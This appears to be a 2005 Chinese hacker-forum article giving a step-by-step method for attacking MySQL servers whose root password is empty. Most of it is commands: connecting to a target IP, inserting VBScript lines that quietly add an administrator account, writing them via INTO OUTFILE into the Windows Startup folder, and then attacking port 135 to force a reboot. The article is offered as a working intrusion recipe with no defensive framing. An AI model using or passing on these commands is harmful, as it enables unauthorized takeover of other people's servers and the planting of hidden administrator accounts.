主页 PC知识 网管技术 黑客帝国 安全技术 开放系统 程序设计 搜索 技术论坛

 

相关联接
 
RHU本级分类

新手入门
入侵实例
工具使用
安全防范
黑客人物
软件破解
漏洞研究

 
RHU阅读排行
·穿透防火墙的数据传输方法(附源码)
·简介For命令具体格式以及在Windows中的妙用
·2003gui界面下手工开3389(图)
·用dos命令破解远程NT用户密码
·劫持数据库实现跨站攻击实例图解
·利用ICMP请求报文探测主机操作系统
·CGI漏洞攻击手册version-0.02
·如何突破一个有限制的SHELL
·SSL/TLS/WTLS原理
·在肉鸡上安装隐蔽的ftp服务器

 
 
RHU最新文章
·禁止让瑞星2008随机启动的绝招
·经典入侵检测术语全接触
·黑客域名劫持攻击详细步骤
·通过注射改管理员密码
·简简单单清除肉鸡上的日志文件
·[基础]Mysql 基本的常用命令
·autorun.inf操作手册
·入侵中快速获得Web根目录的技巧
·浅谈javascript函数劫持
·溢出的原理技术大全

 
 
RHU相关搜索









 
 
RHU广而告之

 
 
>您的位置:首页 -> 黑客帝国-> 新手入门
MYSQL用户root密码为空攻击方法

作者:RHU-TAC编辑员 来自:RHU-TAC编辑搜集 时间:2005-2-27 双击滚屏 收藏本页 字体:


点击 查看RHU2004全年文章


在网上我也找到一些利用此漏洞的方法,一般就是写一个ASP或PHP的后门,不仅很麻烦,而且还要猜解网站的目录,如果对方没有开IIS,那我们岂不没办法了??  

   后来,自己思索想到一个办法,在我测试的几台有此漏洞的机中均获得了成功,现将我的攻击方法公布如下:  

    

   1、连接到对方MYSQL 服务器  

   mysql -u root -h 192.168.0.1  

   mysql.exe 这个程序在你安装了MYSQL的的BIN目录中  

   2、让我们来看看服务器中有些什么数据库  

   mysql>show databases;  

   MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。  

   3、让我们进入数据库  

   mysql>use test;  

   我们将会进入test数据库中  

   4、查看我们进入数据库中有些什么数据表  

   mysql>show tables;  

   默认的情况下,test中没有任何表的存在。  

   以下为关键的部分  

   5、在TEST数据库下创建一个新的表;  

   mysql>create table a (cmd text);  

   好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。  

   6、在表中插入内容  

   mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );  

   mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add"",0) " );  

   mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators zjl317 /add"",0) " );  

   注意双引号和括号以及后面的"0"一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!  

   7、好了,现在我们来看看表a中有些什么  

   mysql>select * from a;  

   我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步  

   8、输出表为一个VBS的脚本文件  

   mysql>select * from a into outfile "c:\docume~1\alluse~1\「开始」菜单\程序\启动\a.vbs";  

   我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意""符号。  

   9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。  

  
   


OVER

[1] 页 RedHyphone.Union 投稿邮箱
[特别声明]:
本站文章大多搜索转载自网络中,如果侵犯了您的权利,请告之我们。本站将立即删除。
本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有。
查看评论】【向上滚屏】【关闭窗口】【 打印
-相关文章
  • 提升权限终极技巧
  • 格式化字符串攻击笔记
  • 入侵win98系统(主机设有共享盘)的几个方法
  • 黑客破解口令常用的三种方法
  • 从一个简单破解中浅谈破解的思路
  • -文章评论 (关闭)
    ·还没有相关的评论!

    网上大名:
    红旋风网络技术联盟 RHUTech.Union
     
    Copyright © 2000-2007 RedHyphone.Union All Rights Reserved. 红旋风联盟版权所有.皖ICP备05011033号
    中国红旋风网络技术联盟 | www.RedHyphone.net
    Mailto:Redhyphone@gamil.com